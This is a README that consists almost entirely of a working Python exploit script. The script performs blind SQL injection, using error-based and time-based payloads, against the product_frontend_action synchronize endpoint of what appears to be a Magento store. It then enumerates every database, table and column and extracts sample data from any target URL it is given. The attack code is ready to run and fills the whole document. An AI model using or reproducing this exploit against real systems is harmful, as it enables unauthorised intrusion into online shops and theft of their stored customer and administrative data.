README.md
Rendering markdown...
#!/usr/bin/env python3
import requests
import string
import binascii
import sys
import time
requests.packages.urllib3.disable_warnings()
class ExploitError(Exception):
pass
class Browser:
PROXY = None
def __init__(self, url):
self.url = url.rstrip('/')
self.s = requests.Session()
self.s.verify = False
if self.PROXY:
self.s.proxies = {'http': self.PROXY, 'https': self.PROXY}
class SQLInjection(Browser):
def encode(self, s: str) -> str:
return '0x' + binascii.b2a_hex(s.encode()).decode()
def find_test_method(self):
for m in (self.test_error, self.test_timebased):
if m('123=123') and not m('123=124'):
self.test = m
return
raise ExploitError('No reliable injection test method found')
def test_error(self, condition: str) -> bool:
payload = f"))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE {condition}) -- -"
r = self.s.get(
f"{self.url}/catalog/product_frontend_action/synchronize",
params={
'type_id': 'recently_products',
'ids[0][added_at]': '',
'ids[0][product_id][from]': '?',
'ids[0][product_id][to]': payload
}
)
return r.status_code == 400
def test_timebased(self, condition: str) -> bool:
payload = f"))) OR (SELECT*FROM (SELECT SLEEP(IF({condition},2,0)))a) -- -"
start = time.time()
self.s.get(
f"{self.url}/catalog/product_frontend_action/synchronize",
params={
'type_id': 'recently_products',
'ids[0][added_at]': '',
'ids[0][product_id][from]': '?',
'ids[0][product_id][to]': payload
}
)
return (time.time() - start) > 1.5
def get_length(self, label: str, expr: str) -> int:
for i in range(1, 100):
condition = f"LENGTH({expr})={i}"
if self.test(condition):
print(f"[+] {label} length = {i}")
return i
raise ExploitError(f"Failed to determine length of {label}")
def word(self, label: str, sql_expr: str, size: int = None, charset: str = None) -> str:
if charset is None:
charset = string.ascii_letters + string.digits + '_-:.@#$%&*()'
if size is None:
try:
size = self.get_length(label, sql_expr)
except ExploitError:
print(f"[!] Skipping {label}, unable to determine length")
return ''
result = ''
for pos in range(1, size + 1):
found = False
for c in charset:
condition = f"ASCII(SUBSTRING(({sql_expr}),{pos},1))={ord(c)}"
if self.test(condition):
result += c
print(f"{label} => {result}", end='\r')
found = True
break
if not found:
result += '?'
print(f"[!] Failed to resolve char at pos {pos} for {label}")
print()
return result
def get_current_db(self):
return self.word("Current DB", "DATABASE()")
def get_databases(self, limit=10, current_first=True):
dbs = []
current = self.get_current_db() if current_first else None
for i in range(limit):
expr = f"(SELECT schema_name FROM information_schema.schemata LIMIT {i},1)"
db = self.word(f"DB#{i+1}", expr)
if db and db != current:
dbs.append(db)
return [current] + dbs if current else dbs
def get_tables(self, db: str, limit: int = 10) -> list:
tables = []
for i in range(limit):
expr = f"(SELECT table_name FROM information_schema.tables WHERE table_schema={self.encode(db)} LIMIT {i},1)"
tbl = self.word(f"Table#{i+1}", expr)
if tbl:
tables.append(tbl)
return tables
def get_columns(self, db: str, table: str, limit: int = 10) -> list:
cols = []
for i in range(limit):
expr = f"(SELECT column_name FROM information_schema.columns WHERE table_schema={self.encode(db)} AND table_name={self.encode(table)} LIMIT {i},1)"
col = self.word(f"Col#{i+1}", expr)
if col:
cols.append(col)
return cols
def get_data(self, db: str, table: str, column: str, limit: int = 5) -> list:
rows = []
for i in range(limit):
expr = f"(SELECT {column} FROM {db}.{table} LIMIT {i},1)"
try:
val = self.word(f"{column}@{i}", expr, charset=string.printable.replace('%','').replace("'", ""))
if val:
rows.append(val)
except ExploitError as e:
print(f"[!] Skipping row {i} due to error: {e}")
continue
return rows
def run(url):
sqli = SQLInjection(url)
try:
sqli.find_test_method()
print("[+] Injection test method detected!")
dbs = sqli.get_databases(limit=10)
print(f"[+] Databases: {dbs}\n")
for db in dbs:
print(f"[>] Enumerating DB: {db}")
tables = sqli.get_tables(db)
print(f"[+] Tables: {tables}")
for table in tables:
cols = sqli.get_columns(db, table)
print(f"[+] Columns in {table}: {cols}")
for col in cols:
data = sqli.get_data(db, table, col)
print(f"[+] Sample data from {table}.{col}: {data}")
except ExploitError as e:
print(f"Error: {e}")
if __name__ == '__main__':
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <target_url>")
sys.exit(1)
run(sys.argv[1])